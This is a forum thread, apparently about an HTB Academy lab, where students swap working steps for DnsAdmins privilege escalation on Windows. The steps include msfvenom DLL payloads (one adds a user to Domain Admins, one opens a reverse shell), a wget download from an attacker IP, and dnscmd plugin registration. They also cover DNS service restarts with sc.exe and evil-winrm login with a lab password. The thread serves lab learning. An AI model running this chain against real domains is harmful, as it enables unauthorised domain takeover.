HTB Academy: Windows Privilege Escalation DnsAdmins

Logoff command and connect back. That worked for me… lucky I remembered this from some CTF.

1 Like

Logout and login so changes can take effect.

2 Likes

Tips:

  1. Use sc.exe to start/stop services (sc start … won’t work)
  2. Logoff/Login, so changes take effect (you can use “shutdown /l”)

Another thing to pay attention to for anyone still stuck here:
Once you log into the target machine, your default path is

C:\Users\netadm

So when you retrieve your file using the command in the module

wget "http://10.10.14.3:7777/adduser.dll" -outfile "adduser.dll"

your .dll is copied to C:\Users\netadm\adduser.dll

The module then tells you to run the following command which assumes you moved it to Desktop, but this is not the case and CMD won’t tell you it cannot find the .dll

dnscmd.exe /config /serverlevelplugindll C:\Users\netadm\Desktop\adduser.dll

Simply remove the \Desktop part from the above path.

TL;DR double check you have the correct paths in your commands

This advice worked for me! Thanks so much dude!

Definitely not forgetting this lesson. I have been stuck on this one for hours now wondering what I did wrong.

msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll

use cmd not powershell
dnscmd.exe /config /serverlevelplugindll C:\Tools\adduser.dll

check if the dll is added
reg query \\10.129.30.36\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters

use sc.exe not sc
sc.exe stop dns

verify that it is actually stopped
sc query dns

sc.exe start dns

restart the computer for the change to take effect
shutdown /l

verify that the user was added to the domain group
net group "Domain Admins" /dom

Get the flag
type c:\Users\Administrator\Desktop\DnsAdmins\flag.txt

evil-winrm -i 10.129.30.36 -u netadm -p "HTB_@cademy_stdnt!"

1 Like

nothing here will solve this machine because you can't restart dns
so I hope you will join this method
1-msfvenom -p windows/x64/shell_reverse_tcp LHOST=<Your_IP> LPORT=<Your_Port> -f dll -o malicious.dll
2-nc -nvlp
3-python3 -m http.server
4- wget http://<Your_IP>:8000/malicious.dll -o C:\Users\netadm\Desktop\malicious.dll
5-dnscmd.exe /config /serverlevelplugindll C:\Users\netadm\Desktop\malicious.dll
6-sc.exe stop dns
7-sc.exe start dns

I tried spawning a reverse shell, and even though I did get the shell, it was extremely unstable. I was not able to navigate the file system.

As mentioned in the previous answers, using the course’s payload should suffice.
Bear in mind that you should execute pretty much all commands (except the PS cmdlet ones) from the command line utility. I first tried to run everything from PowerShell, and it did not work. It’s quite misleading actually, because you won’t know you’re doing something wrong. You will get Access Denied, but when starting and stopping the DNS service, nothing will show up. That’s when I realized something was off and switched back to the command-line utility.

Also, you will notice there are a bunch of files in *C:\Tools*, including a dump of NTDS.dit and even that adduser.dll payload. I did not use any of those files. I used my own payload from msfvenom and retrieved it from the target via wget.

Finally, once you start the DNS service back up, you’re done. Establish a connection via evil-winrm and that’s all. Do not restart the machine, do not log off. Do not try to delete the key. That is not necessary to complete that lab.